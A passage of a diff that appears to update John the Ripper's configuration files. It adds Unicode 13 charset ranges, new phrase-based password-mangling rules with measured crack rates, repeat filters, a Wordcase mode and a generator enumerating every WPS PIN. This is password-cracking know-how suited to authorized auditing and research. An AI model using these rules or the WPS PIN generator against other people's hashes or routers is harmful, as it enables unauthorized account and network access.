c = 0x1e100; // from NYIAKENG PUACHUE HMONG LETTER MA
while (c <= 0x1e12c) // ..to NYIAKENG PUACHUE HMONG LETTER W
charset[i++] = c++;
c = 0x1e130; // from NYIAKENG PUACHUE HMONG TONE-B
while (c <= 0x1e13d) // ..to NYIAKENG PUACHUE HMONG SYLLABLE LENGTHENER
charset[i++] = c++;
c = 0x1e140; // from NYIAKENG PUACHUE HMONG DIGIT ZERO
while (c <= 0x1e149) // ..to NYIAKENG PUACHUE HMONG DIGIT NINE
charset[i++] = c++;
charset[i++] = 0x1e14e; // NYIAKENG PUACHUE HMONG LOGOGRAM NYAJ
charset[i++] = 0x1e14f; // NYIAKENG PUACHUE HMONG CIRCLED CA
// 1E2C0..1E2FF; Wancho
c = 0x1e2c0; // from WANCHO LETTER AA
while (c <= 0x1e2f9) // ..to WANCHO DIGIT NINE
charset[i++] = c++;
charset[i++] = 0x1e2ff; // WANCHO NGUN SIGN
// 1E800..1E8DF; Mende Kikakui
c = 0x1e800; // from MENDE KIKAKUI SYLLABLE M001 KI
while (c <= 0x1e8c4) // ..to MENDE KIKAKUI SYLLABLE M060 NYON
@@ -2096,7 +2176,7 @@ void init()
charset[i++] = c++;
// 1E900..1E95F; Adlam
c = 0x1e900; // from ADLAM CAPITAL LETTER ALIF
while (c <= 0x1e94a) // ..to ADLAM NUKTA
while (c <= 0x1e94b) // ..to ADLAM NASALIZATION MARK
charset[i++] = c++;
c = 0x1e950; // from ADLAM DIGIT ZERO
while (c <= 0x1e959) // ..to ADLAM DIGIT NINE
@@ -2107,6 +2187,10 @@ void init()
c = 0x1ec71; // from INDIC SIYAQ NUMBER ONE
while (c <= 0x1ecb4) // ..to INDIC SIYAQ ALTERNATE LAKH MARK
charset[i++] = c++;
// 1ED00..1ED4F; Ottoman Siyaq Numbers
c = 0x1ed01; // from OTTOMAN SIYAQ NUMBER ONE
while (c <= 0x1ed3d) // ..to OTTOMAN SIYAQ FRACTION ONE SIXTH
charset[i++] = c++;
// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
c = 0x1ee00; // from ARABIC MATHEMATICAL ALEF
while (c <= 0x1ee03) // ..to ARABIC MATHEMATICAL DAL
@@ -2179,13 +2263,7 @@ void init()
charset[i++] = c++;
// 1F100..1F1FF; Enclosed Alphanumeric Supplement
c = 0x1f100; // from DIGIT ZERO FULL STOP
while (c <= 0x1f10c) // ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
charset[i++] = c++;
c = 0x1f110; // from PARENTHESIZED LATIN CAPITAL LETTER A
while (c <= 0x1f16b) // ..to RAISED MD SIGN
charset[i++] = c++;
c = 0x1f170; // from NEGATIVE SQUARED LATIN CAPITAL LETTER A
while (c <= 0x1f1ac) // ..to SQUARED VOD
while (c <= 0x1f1ad) // ..to MASK WORK SYMBOL
charset[i++] = c++;
c = 0x1f1e6; // from REGIONAL INDICATOR SYMBOL LETTER A
while (c <= 0x1f1ff) // ..to REGIONAL INDICATOR SYMBOL LETTER Z
@@ -2218,13 +2296,13 @@ void init()
charset[i++] = c++;
// 1F680..1F6FF; Transport and Map Symbols
c = 0x1f680; // from ROCKET
while (c <= 0x1f6d4) // ..to PAGODA
while (c <= 0x1f6d7) // ..to ELEVATOR
charset[i++] = c++;
c = 0x1f6e0; // from HAMMER AND WRENCH
while (c <= 0x1f6ec) // ..to AIRPLANE ARRIVING
charset[i++] = c++;
c = 0x1f6f0; // from SATELLITE
while (c <= 0x1f6f9) // ..to SKATEBOARD
while (c <= 0x1f6fc) // ..to ROLLER SKATE
charset[i++] = c++;
// 1F700..1F77F; Alchemical Symbols
c = 0x1f700; // from ALCHEMICAL SYMBOL FOR QUINTESSENCE
@@ -2234,6 +2312,9 @@ void init()
c = 0x1f780; // from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
while (c <= 0x1f7d8) // ..to NEGATIVE CIRCLED SQUARE
charset[i++] = c++;
c = 0x1f7e0; // from LARGE ORANGE CIRCLE
while (c <= 0x1f7eb) // ..to LARGE BROWN SQUARE
charset[i++] = c++;
// 1F800..1F8FF; Supplemental Arrows-C
c = 0x1f800; // from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
while (c <= 0x1f80b) // ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
@@ -2250,37 +2331,58 @@ void init()
c = 0x1f890; // from LEFTWARDS TRIANGLE ARROWHEAD
while (c <= 0x1f8ad) // ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
charset[i++] = c++;
charset[i++] = 0x1f8b0; // ARROW POINTING UPWARDS THEN NORTH WEST
charset[i++] = 0x1f8b1; // ARROW POINTING RIGHTWARDS THEN CURVING SOUTH WEST
// 1F900..1F9FF; Supplemental Symbols and Pictographs
c = 0x1f900; // from CIRCLED CROSS FORMEE WITH FOUR DOTS
while (c <= 0x1f90b) // ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
while (c <= 0x1f978) // ..to DISGUISED FACE
charset[i++] = c++;
c = 0x1f910; // from ZIPPER-MOUTH FACE
while (c <= 0x1f93e) // ..to HANDBALL
c = 0x1f97a; // from FACE WITH PLEADING EYES
while (c <= 0x1f9cb) // ..to BUBBLE TEA
charset[i++] = c++;
c = 0x1f940; // from WILTED FLOWER
while (c <= 0x1f970) // ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
charset[i++] = c++;
c = 0x1f973; // from FACE WITH PARTY HORN AND PARTY HAT
while (c <= 0x1f976) // ..to FREEZING FACE
charset[i++] = c++;
c = 0x1f97c; // from LAB COAT
while (c <= 0x1f9a2) // ..to SWAN
charset[i++] = c++;
c = 0x1f9b0; // from EMOJI COMPONENT RED HAIR
while (c <= 0x1f9b9) // ..to SUPERVILLAIN
charset[i++] = c++;
charset[i++] = 0x1f9c0; // CHEESE WEDGE
charset[i++] = 0x1f9c2; // SALT SHAKER
c = 0x1f9d0; // from FACE WITH MONOCLE
c = 0x1f9cd; // from STANDING PERSON
while (c <= 0x1f9ff) // ..to NAZAR AMULET
charset[i++] = c++;
// 1FA00..1FA6F; Chess Symbols
c = 0x1fa00; // from NEUTRAL CHESS KING
while (c <= 0x1fa53) // ..to BLACK CHESS KNIGHT-BISHOP
charset[i++] = c++;
c = 0x1fa60; // from XIANGQI RED GENERAL
while (c <= 0x1fa6d) // ..to XIANGQI BLACK SOLDIER
charset[i++] = c++;
// 1FA70..1FAFF; Symbols and Pictographs Extended-A
c = 0x1fa70; // from BALLET SHOES
while (c <= 0x1fa74) // ..to THONG SANDAL
charset[i++] = c++;
charset[i++] = 0x1fa78; // DROP OF BLOOD
charset[i++] = 0x1fa7a; // STETHOSCOPE
c = 0x1fa80; // from YO-YO
while (c <= 0x1fa86) // ..to NESTING DOLLS
charset[i++] = c++;
c = 0x1fa90; // from RINGED PLANET
while (c <= 0x1faa8) // ..to ROCK
charset[i++] = c++;
c = 0x1fab0; // from FLY
while (c <= 0x1fab6) // ..to FEATHER
charset[i++] = c++;
charset[i++] = 0x1fac0; // ANATOMICAL HEART
charset[i++] = 0x1fac2; // PEOPLE HUGGING
c = 0x1fad0; // from BLUEBERRIES
while (c <= 0x1fad6) // ..to TEAPOT
charset[i++] = c++;
// 1FB00..1FBFF; Symbols for Legacy Computing
c = 0x1fb00; // from BLOCK SEXTANT-1
while (c <= 0x1fb92) // ..to UPPER HALF INVERSE MEDIUM SHADE AND LOWER HALF BLOCK
charset[i++] = c++;
c = 0x1fb94; // from LEFT HALF INVERSE MEDIUM SHADE AND RIGHT HALF BLOCK
while (c <= 0x1fbca) // ..to WHITE UP-POINTING CHEVRON
charset[i++] = c++;
c = 0x1fbf0; // from SEGMENTED DIGIT ZERO
while (c <= 0x1fbf9) // ..to SEGMENTED DIGIT NINE
charset[i++] = c++;
// 20000..2A6DF; CJK Unified Ideographs Extension B
c = 0x20000; // from <CJK Ideograph Extension B, First>
while (c <= 0x2a6d6) // ..to <CJK Ideograph Extension B, Last>
while (c <= 0x2a6dd) // ..to <CJK Ideograph Extension B, Last>
charset[i++] = c++;
// 2A700..2B73F; CJK Unified Ideographs Extension C
c = 0x2a700; // from <CJK Ideograph Extension C, First>
@@ -2302,6 +2404,10 @@ void init()
c = 0x2f800; // from CJK COMPATIBILITY IDEOGRAPH-2F800
while (c <= 0x2fa1d) // ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
charset[i++] = c++;
// 30000..3134F; CJK Unified Ideographs Extension G
c = 0x30000; // from <CJK Ideograph Extension G, First>
while (c <= 0x3134a) // ..to <CJK Ideograph Extension G, Last>
charset[i++] = c++;
// E0000..E007F; Tags
c = 0xe0020; // from TAG SPACE
while (c <= 0xe007f) // ..to CANCEL TAG
+4 -2
View File
@@ -10,7 +10,8 @@ dynamic_57 = Y
dynamic_58 = Y
# dyna-61 used by formspring and should not be disabled.
dynamic_61 = N
dynamic_62 = Y
# dyna-62 is ITW
dynamic_62 = N
dynamic_63 = Y
dynamic_64 = Y
dynamic_65 = Y
@@ -26,7 +27,8 @@ dynamic_76 = Y
dynamic_77 = Y
dynamic_78 = Y
dynamic_81 = Y
dynamic_82 = Y
# dyna-82 it ITW Filezilla
dynamic_82 = N
dynamic_83 = Y
dynamic_84 = Y
dynamic_85 = Y
+219 -40
View File
@@ -141,10 +141,10 @@ PotFilePermissions = 0600
# Default is N
IgnoreChmodErrors = N
# This figure is in MB. The default is to memory map wordlists not larger
# than one terabyte.
# This figure is in MiB. The default is to memory map wordlists not larger
# than one GiB.
# Set this to 0 to disable any use of memory-mapping in wordlist mode.
WordlistMemoryMapMaxSize = 1048576
WordlistMemoryMapMaxSize = 1024
# For single mode, load the full GECOS field (before splitting) as one
# additional candidate. Normal behavior is to only load individual words
@@ -172,7 +172,8 @@ SingleSkipLogin = N
SingleWordsPairMax = 6
# Setting this to false stops Single mode from re-testing guessed plaintexts
# with all other salts.
# with all other salts. This is deprecated: Use command-line per-session
# option --single-retest-guess=no instead.
SingleRetestGuessed = Y
# Max recursion depth for SingleRetestGuessed, so we don't blow the stack
@@ -215,7 +216,7 @@ SessionFileProtect = Disabled
# reused by a new session.
# (Of course, a restored session will always be allowed to append to an
# existing log file.)
# Unless you use the --nolog option, setting LogFileProtect will also
# Unless you use the --no-log option, setting LogFileProtect will also
# prevent overwriting existing session files.
LogFileProtect = Disabled
@@ -239,6 +240,7 @@ ShowRemainOnStatus = N
LogCrackedPasswords = N
# Disable the dupe checking when loading hashes. For testing purposes only!
# This is deprecated: Use per-session option --loader-dupecheck=no instead.
NoLoaderDupeCheck = N
# Default encoding for input files (ie. login/GECOS fields) and wordlists
@@ -321,11 +323,11 @@ ReloadAtDone = Y
# but it may be delayed by the "Save" timer setting near top of this file.
ReloadAtSave = Y
# If this file exists, john will abort cleanly
AbortFile = /var/run/john/abort
# If this file exists, john will abort cleanly (uncomment to enable)
#AbortFile = /var/run/john/abort
# While this file exists, john will pause
PauseFile = /var/run/john/pause
# While this file exists, john will pause (uncomment to enable)
#PauseFile = /var/run/john/pause
# If set to true, the uid will be appended to user name on cracks
# With: password123 (Administrator:500)
@@ -525,12 +527,12 @@ Frequency = 160
#Frequency = 160
# Some bitstreams accept runtime configuration.
# In sha512crypt/Drupal7, configuration is 2 bytes. That's interpreted
# as a bitmask. By setting any of the lowest 10 bits to 1 it turns off
# corresponding unit (there are 10 units in the bitstream).
# as a bitmask. By setting any of the lowest 12 bits to 1 it turns off
# the corresponding unit (there are 12 units in the bitstream).
# This turns off units 0 and 1.
#Config1 = \x03\x00
# This turns off all 10 units (resulting in a timeout).
#Config1_04A36E0FD6_0 = \xff\x03
# This turns off all 12 units (resulting in a timeout).
#Config1_04A36E0FD6_0 = \xff\x0f
[ZTEX:sha256crypt]
# Design tools reported possible frequency is 241 MHz but tested boards
@@ -548,10 +550,10 @@ Frequency = 180
Frequency = 180
#TargetRounds = 2048
# These formats are disabled from all-formats --test runs, or auto-selection
# of format from an input file. Even when disabled, you can use them as long
# as you spell them out with the --format option. Or you can delete a line,
# comment it out, or change to 'N'
# These formats are disabled from listing or self-test/benchmark unless
# specifically requested. You can use them as long as you add them out with
# the --format option. Or you can delete a line, comment it out, or change
# to 'N' and the format will be enabled again.
[Disabled:Formats]
#formatname = Y
.include '$JOHN/dynamic_disabled.conf'
@@ -723,7 +725,6 @@ DefaultCharset =
(?a )?d /?d a0 'p Xpz0
)?a (?d /?a a0 'p Xpz0
# "Single crack" mode rules
[List.Rules:Single]
# Simple rules come first...
@@ -1015,6 +1016,8 @@ W0Q
->F a0 WEQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]
->G a0 WFQW[z0]W[z1]W[z2]W[z3]W[z4]W[z5]W[z6]W[z7]W[z8]W[z9]W[zA]W[zB]W[zC]W[zD]W[zE]
# This ruleset partially overlaps with some Phrase* rulesets below, but it was
# historically introduced and made part of the jumbo ruleset first, so it stays
[List.Rules:Multiword]
-c / Dp l
-c / Dp c Tp
@@ -1037,6 +1040,49 @@ W0Q
-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %2[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
-c %4[ ] T[0z] \p0[Q:] \p0[M:] va01 vbpa Tb Q M %3[ ] vbpa Tb Q M /[ ] vbpa Tb Q @?[Zw]
# A special ruleset intended for stacking before other Phrase* rules below,
# such that you have the option to run its output through "unique" first
[List.Rules:PhrasePreprocess]
/[ ] :
-c /[ ] l Q
/[ ] @' Q
-c /[ ] @' Q M l Q
# The main optimized Phrase ruleset, almost no duplicates with proper input
[List.Rules:Phrase]
# This one rule cracks ~1050 HIBP v7 passwords per million with sequences of
# 2 to 6 words occurring 2+ times across Project Gutenberg Australia books
# when our sequence list includes them in both their original case and
# all-lowercase, as well as both with apostrophes intact and removed (these
# variations are not implemented in this ruleset not to produce duplicates)
@?w Q
# Sorted separator characters: 1_24 -.3785690@,&+*!'$/?:=#~^%;`>"[)<]|({}\
# (the apostrophe is probably overrated since it also occurs inside words)
# Each character in 1_24 cracks ~82 to ~61 passwords per million
s[ ][1_24] Q
# Leaving the space separators intact cracks ~59 passwords per million
/[ ]
# Each character in -.3785690@ cracks ~53 to ~12 passwords per million
s[ ][\-.3785690@] Q
# Each character in ,&+*!'$/?:=#~ cracks ~10 to ~1 passwords per million
s[ ][,&+*!'$/?:=#~] Q
# Toggle capitalization of words 1 to 6 individually
[List.Rules:PhraseCaseOne]
-c /[ ] T0 Q
-c /[ ] va01 vapa Ta Q
-c %2[ ] va01 vapa Ta Q
-c %3[ ] va01 vapa Ta Q
-c %4[ ] va01 vapa Ta Q
-c %5[ ] va01 vapa Ta Q
# Move first word to be after last word
[List.Rules:PhraseWrap]
/[ ] ^[ ] Xpz0 \[ 'l
# Other ways to write this rule
#/[ ] xpz \[ $[ ] X0pz 'l
#/[ ] 'p ^[ ] va01 vapa Xaz0
# Used for loopback. This rule will produce candidates "PASSWOR" and "D" for
# an input of "PASSWORD" (assuming LM, which has halves of length 7).
[List.Rules:Split]
@@ -1167,6 +1213,9 @@ b1 ]
.include [List.Rules:Extra]
.include [List.Rules:OldOffice]
# Unicode substitution rules
.include <unisubst.conf>
# For Wordlist mode and very fast hashes
[List.Rules:Jumbo]
.include [List.Rules:Single-Extra]
@@ -1174,6 +1223,7 @@ b1 ]
.include [List.Rules:ShiftToggle]
.include [List.Rules:Multiword]
.include [List.Rules:best64]
.include [List.Rules:UnicodeSubstitution]
# KoreLogic rules
.include <korelogic.conf>
@@ -1189,7 +1239,9 @@ b1 ]
# Incremental modes
# This is for one-off uses (make your own custom.chr)
# This is for one-off uses (make your own custom.chr).
# A charset can now also be named directly from command-line, so no config
# entry needed: --incremental=whatever.chr
[Incremental:Custom]
File = $JOHN/custom.chr
MinLen = 0
@@ -1548,6 +1600,65 @@ void filter()
word = 0;
}
# Skip candidate passwords that contain the same character more than once
[List.External:Filter_NoRepeats]
int seen[0x100], now;
void init()
{
now = 1;
}
void filter()
{
int i, c;
if (!--now) {
i = 0;
while (i < 0x100)
seen[i++] = 0;
now = 1000000000;
}
i = 0;
while (c = word[i++]) {
if (seen[c] == now) {
word = 0; return;
}
seen[c] = now;
}
}
# Keep only candidate passwords that contain the same character more than once
[List.External:Filter_Repeats]
int seen[0x100], now;
void init()
{
now = 1;
}
void filter()
{
int i, c;
if (!--now) {
i = 0;
while (i < 0x100)
seen[i++] = 0;
now = 1000000000;
}
i = 0;
while (c = word[i++]) {
if (seen[c] == now)
return;
seen[c] = now;
}
word = 0;
}
# A simple cracker for LM hashes
[List.External:LanMan]
int length; // Current length
@@ -2167,6 +2278,9 @@ void init()
# than the maximum length (the maxlength setting). Nevertheless, you may want
# to pass the resulting candidate passwords through "unique" if you intend to
# test them against hashes that are salted and/or of a slow to compute type.
#
# Note that we now have a full blown cracking mode --subsets that is way faster
# than this code and never produce a duplicate. See doc/SUBSETS
[List.External:Subsets]
int minlength; // Minimum password length to try
int maxlength; // Maximum password length to try
@@ -3383,6 +3497,40 @@ void restore()
}
}
# generate all possible wps pins
[List.External:wpspin]
int pin;
void init() {
pin = 0;
}
void generate() {
if (pin > 9999999) {
word = 0;
return;
}
int i, p;
i = 0;
while (i < 8) word[i++] = '0';
word[8] = 0;
p = pin;
i = 6;
while (p) {
word[i] = '0' + p % 10;
p /= 10;
--i;
}
p = pin;
i = 0;
while (p) {
i += 3 * (p % 10);
p /= 10;
i += p % 10;
p /= 10;
}
word[7] = '0' + ((10 - i % 10) % 10);
++pin;
}
# Append the Luhn algorithm digit to arbitrary all-digit strings. Optimized
# for speed, not for size nor simplicity. The primary optimization trick is to
# compute the length and four sums in parallel (in two SIMD'ish variables).
@@ -3860,8 +4008,8 @@ void next()
}
/* restore() not needed. john properly restores fast enough without it */
# External hybrid CaSE mutation code
[List.External:Case]
# Shared base code for External hybrid CaSE and Wordcase mutation code
[List.External_base:Case]
int rotor[251]; /* max length input is 125 bytes [125*5+1]; */
int rotors[125];
@@ -3871,17 +4019,12 @@ int rotor_cnt[125];
int current_word_count;
int max_mangle; /* controls how many bytes we run through our 'leet' code */
int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
void init()
{
max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
}
int word_mode; /* if set to 1, only first character of each space-separated word is case-toggled, else every character */
/* new word */
void new()
{
int rotor_off, idx, wlen, ch;
int rotor_off, idx, wlen, ch, prevch;
idx = rotor_off = wlen = 0;
hybrid_total = 1;
while (word[wlen++]) ; --wlen;
@@ -3890,24 +4033,32 @@ void new()
return;
}
wlen = 0;
prevch = ' '; /* at word start, behave as if previous char was space for wordcase mode */
while (word[wlen] && idx < max_mangle) {
rotor_cnt[wlen] = rotor_idx[wlen] = 0;
rotor_ptr[wlen] = rotor_off;
ch = word[wlen];
if (ch >= 'A' && ch <= 'Z') {
ch += 0x20;
word[wlen] = ch;
rotor[rotor_off++] = ch;
rotor[rotor_off++] = ch-0x20;
}
if (ch >= 'a' && ch <= 'z') {
rotor[rotor_off++] = ch;
rotor[rotor_off++] = ch-0x20;
rotor_cnt[wlen] = 2;
hybrid_total *= 2;
rotors[idx++] = wlen;
/* traditionally, this block was always executed, with Wordcase
mode added we execute it either always when word_mode isn't
used or at the beginning of a word or when the previous char
was space */
if (!word_mode || prevch == ' ') {
if (ch >= 'A' && ch <= 'Z') {
ch += 0x20;
word[wlen] = ch;
rotor[rotor_off++] = ch;
rotor[rotor_off++] = ch-0x20;
}
if (ch >= 'a' && ch <= 'z') {
rotor[rotor_off++] = ch;
rotor[rotor_off++] = ch-0x20;
rotor_cnt[wlen] = 2;
hybrid_total *= 2;
rotors[idx++] = wlen;
}
}
++wlen;
prevch = ch;
}
/* hybrid_total+666 is our indicator that this is the original word */
if (original_word)
@@ -3942,9 +4093,37 @@ void next()
}
/* restore() not needed. john properly restores fast enough without it */
# External hybrid CaSE mutation code
[List.External:Case]
.include [List.External_base:Case]
void init()
{
max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
word_mode = 0;
}
# external mode toggling case in all word combinations, e.g:
# foo bar -> foo bar, foo Bar, Foo bar, Foo Bar
[List.External:Wordcase]
.include [List.External_base:Case]
void init()
{
max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
word_mode = 1;
}
# Alternate hybrid external 'leet' mode (HybridLeet)
.include <hybrid.conf>
# Note that the (newer) cracking mode --subsets=full-unicode is way faster than
# the external dumb/repeats modes below, although not as easy to adapt to smaller
# portions of the Unicode space. See doc/SUBSETS
# dumb-force UTF-16, in an external file
.include <dumb16.conf>
+1 -1
View File
@@ -14,7 +14,7 @@ a6 A0"[Aa][uU][tT][uU][mM][nN]"
[List.Rules:AppendSeason]
a6 Az"[Ss$][uU][mM][mM][eE3][rR]"
a6 Az"[Ww][iI|][nN][tT+][eE3][rR]"
a6 Az"[Ff][aA][lL][lL]"
a4 Az"[Ff][aA][lL][lL]"
a6 Az"[Ss][pP][rR][iI][nN][gG]"
a6 Az"[Aa][uU][tT][uU][mM][nN]"
+34 -40
View File
@@ -1,16 +1,21 @@
# This software is Copyright (c) 2012-2018 magnum, and it is hereby
# This software is Copyright (c) 2012-2020 magnum, and it is hereby
# released to the general public under the following terms:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# Try strings of repeated characters, Unicode (version 11) BMP version
# Try strings of repeated characters, Unicode (version 13) BMP version
#
# Number of candidates = 55,292 x max-length
# Number of candidates = 55,387 x max-length
#
# Note that these modes will handle --max-len differently than normal: They
# will consider number of characters as opposed to number of bytes. This
# means you can naturally just use e.g. --max-len=3 for generating all
# three-character candidates (which may be up to 9 bytes each).
#
# Note that the (newer) cracking mode --subsets=full-unicode is way faster than
# this external mode, although not as easy to adapt to smaller portions of the
# Unicode space. See doc/SUBSETS
[List.External:Repeats16]
int minlength, maxlength, maxc, length, c;
int charset[0x10000];
@@ -159,7 +164,7 @@ void init()
while (c <= 0x8b4) // ..to ARABIC LETTER KAF WITH DOT BELOW
charset[i++] = c++;
c = 0x8b6; // from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
while (c <= 0x8bd) // ..to ARABIC LETTER AFRICAN NOON
while (c <= 0x8c7) // ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
charset[i++] = c++;
c = 0x8d3; // from ARABIC SMALL LOW WAW
while (c <= 0x8ff) // ..to ARABIC MARK SIDEWAYS NOON GHUNNA
@@ -296,7 +301,7 @@ void init()
charset[i++] = 0xb48; // ORIYA VOWEL SIGN AI
charset[i++] = 0xb4b; // ORIYA VOWEL SIGN O
charset[i++] = 0xb4d; // ORIYA SIGN VIRAMA
charset[i++] = 0xb56; // ORIYA AI LENGTH MARK
charset[i++] = 0xb55; // ORIYA SIGN OVERLINE
charset[i++] = 0xb57; // ORIYA AU LENGTH MARK
charset[i++] = 0xb5c; // ORIYA LETTER RRA
charset[i++] = 0xb5d; // ORIYA LETTER RHA
@@ -369,7 +374,7 @@ void init()
c = 0xc66; // from TELUGU DIGIT ZERO
while (c <= 0xc6f) // ..to TELUGU DIGIT NINE
charset[i++] = c++;
c = 0xc78; // from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
c = 0xc77; // from TELUGU SIGN SIDDHAM
while (c <= 0xc7f) // ..to TELUGU SIGN TUUMU
charset[i++] = c++;
// 0C80..0CFF; Kannada
@@ -407,9 +412,6 @@ void init()
charset[i++] = 0xcf2; // KANNADA SIGN UPADHMANIYA
// 0D00..0D7F; Malayalam
c = 0xd00; // from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
while (c <= 0xd03) // ..to MALAYALAM SIGN VISARGA
charset[i++] = c++;
c = 0xd05; // from MALAYALAM LETTER A
while (c <= 0xd0c) // ..to MALAYALAM LETTER VOCALIC L
charset[i++] = c++;
charset[i++] = 0xd0e; // MALAYALAM LETTER E
@@ -429,7 +431,7 @@ void init()
while (c <= 0xd7f) // ..to MALAYALAM LETTER CHILLU K
charset[i++] = c++;
// 0D80..0DFF; Sinhala
charset[i++] = 0xd82; // SINHALA SIGN ANUSVARAYA
charset[i++] = 0xd81; // SINHALA SIGN CANDRABINDU
charset[i++] = 0xd83; // SINHALA SIGN VISARGAYA
c = 0xd85; // from SINHALA LETTER AYANNA
while (c <= 0xd96) // ..to SINHALA LETTER AUYANNA
@@ -464,23 +466,15 @@ void init()
// 0E80..0EFF; Lao
charset[i++] = 0xe81; // LAO LETTER KO
charset[i++] = 0xe82; // LAO LETTER KHO SUNG
charset[i++] = 0xe87; // LAO LETTER NGO
charset[i++] = 0xe88; // LAO LETTER CO
c = 0xe94; // from LAO LETTER DO
while (c <= 0xe97) // ..to LAO LETTER THO TAM
c = 0xe86; // from LAO LETTER PALI GHA
while (c <= 0xe8a) // ..to LAO LETTER SO TAM
charset[i++] = c++;
c = 0xe99; // from LAO LETTER NO
while (c <= 0xe9f) // ..to LAO LETTER FO SUNG
c = 0xe8c; // from LAO LETTER PALI JHA
while (c <= 0xea3) // ..to LAO LETTER LO LING
charset[i++] = c++;
charset[i++] = 0xea1; // LAO LETTER MO
charset[i++] = 0xea3; // LAO LETTER LO LING
charset[i++] = 0xeaa; // LAO LETTER SO SUNG
charset[i++] = 0xeab; // LAO LETTER HO SUNG
c = 0xead; // from LAO LETTER O
while (c <= 0xeb9) // ..to LAO VOWEL SIGN UU
c = 0xea7; // from LAO LETTER WO
while (c <= 0xebd) // ..to LAO SEMIVOWEL SIGN NYO
charset[i++] = c++;
charset[i++] = 0xebb; // LAO VOWEL SIGN MAI KON
charset[i++] = 0xebd; // LAO SEMIVOWEL SIGN NYO
c = 0xec0; // from LAO VOWEL SIGN E
while (c <= 0xec4) // ..to LAO VOWEL SIGN AI
charset[i++] = c++;
@@ -706,7 +700,7 @@ void init()
charset[i++] = c++;
// 1AB0..1AFF; Combining Diacritical Marks Extended
c = 0x1ab0; // from COMBINING DOUBLED CIRCUMFLEX ACCENT
while (c <= 0x1abe) // ..to COMBINING PARENTHESES OVERLAY
while (c <= 0x1ac0) // ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
charset[i++] = c++;
// 1B00..1B7F; Balinese
c = 0x1b00; // from BALINESE SIGN ULU RICEM
@@ -755,7 +749,7 @@ void init()
charset[i++] = c++;
// 1CD0..1CFF; Vedic Extensions
c = 0x1cd0; // from VEDIC TONE KARSHANA
while (c <= 0x1cf9) // ..to VEDIC TONE DOUBLE RING ABOVE
while (c <= 0x1cfa) // ..to VEDIC SIGN DOUBLE ANUSVARA ANTARGOMUKHA
charset[i++] = c++;
// 1D00..1D7F; Phonetic Extensions
c = 0x1d00; // from LATIN LETTER SMALL CAPITAL A
@@ -922,11 +916,8 @@ void init()
c = 0x2b76; // from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
while (c <= 0x2b95) // ..to RIGHTWARDS BLACK ARROW
charset[i++] = c++;
c = 0x2b98; // from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
while (c <= 0x2bc8) // ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
charset[i++] = c++;
c = 0x2bca; // from TOP HALF BLACK CIRCLE
while (c <= 0x2bfe) // ..to REVERSED RIGHT ANGLE
c = 0x2b97; // from SYMBOL FOR TYPE A ELECTRONICS
while (c <= 0x2bff) // ..to HELLSCHREIBER PAUSE SYMBOL
charset[i++] = c++;
// 2C00..2C5F; Glagolitic
c = 0x2c00; // from GLAGOLITIC CAPITAL LETTER AZU
@@ -994,7 +985,7 @@ void init()
charset[i++] = c++;
// 2E00..2E7F; Supplemental Punctuation
c = 0x2e00; // from RIGHT ANGLE SUBSTITUTION MARKER
while (c <= 0x2e4e) // ..to PUNCTUS ELEVATUS MARK
while (c <= 0x2e52) // ..to TIRONIAN SIGN CAPITAL ET
charset[i++] = c++;
// 2E80..2EFF; CJK Radicals Supplement
c = 0x2e80; // from CJK RADICAL REPEAT
@@ -1040,7 +1031,7 @@ void init()
charset[i++] = c++;
// 31A0..31BF; Bopomofo Extended
c = 0x31a0; // from BOPOMOFO LETTER BU
while (c <= 0x31ba) // ..to BOPOMOFO LETTER ZY
while (c <= 0x31bf) // ..to BOPOMOFO LETTER AH
charset[i++] = c++;
// 31C0..31EF; CJK Strokes
c = 0x31c0; // from CJK STROKE T
@@ -1055,7 +1046,7 @@ void init()
while (c <= 0x321e) // ..to PARENTHESIZED KOREAN CHARACTER O HU
charset[i++] = c++;
c = 0x3220; // from PARENTHESIZED IDEOGRAPH ONE
while (c <= 0x32fe) // ..to CIRCLED KATAKANA WO
while (c <= 0x32ff) // ..to SQUARE ERA NAME REIWA
charset[i++] = c++;
// 3300..33FF; CJK Compatibility
c = 0x3300; // from SQUARE APAATO
@@ -1063,7 +1054,7 @@ void init()
charset[i++] = c++;
// 3400..4DBF; CJK Unified Ideographs Extension A
c = 0x3400; // from <CJK Ideograph Extension A, First>
while (c <= 0x4db5) // ..to <CJK Ideograph Extension A, Last>
while (c <= 0x4dbf) // ..to <CJK Ideograph Extension A, Last>
charset[i++] = c++;
// 4DC0..4DFF; Yijing Hexagram Symbols
c = 0x4dc0; // from HEXAGRAM FOR THE CREATIVE HEAVEN
@@ -1071,7 +1062,7 @@ void init()
charset[i++] = c++;
// 4E00..9FFF; CJK Unified Ideographs
c = 0x4e00; // from <CJK Ideograph, First>
while (c <= 0x9fef) // ..to <CJK Ideograph, Last>
